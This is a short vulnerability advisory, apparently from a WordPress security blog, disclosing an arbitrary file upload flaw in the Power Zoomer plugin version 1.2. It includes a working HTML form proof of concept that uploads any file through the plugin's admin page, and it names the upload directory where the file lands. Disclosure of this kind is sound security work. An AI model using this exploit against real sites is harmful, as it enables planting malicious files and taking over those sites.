Arbitrary File Upload Vulnerability in Power Zoomer
The Power Zoomer plugin has an arbitrary file upload vulnerability (as well as a persistent cross-site scripting (XSS) vulnerability and possibly other security issues) as of version 1.2. The details of the underlying issue that causes this can be found inour post for a vulnerability in the plugin Vertical Slideshow, which shares the same vulnerable code.
Proof of Concept
The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories the uploaded file will be located in the directory /wp-content/uploads/powerzoomer/1_uploadfolder/big/.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=powerzoomer_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="pwz_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html>
Timeline
- 6/7/2016 – WordPress.org Plugin Directory notified.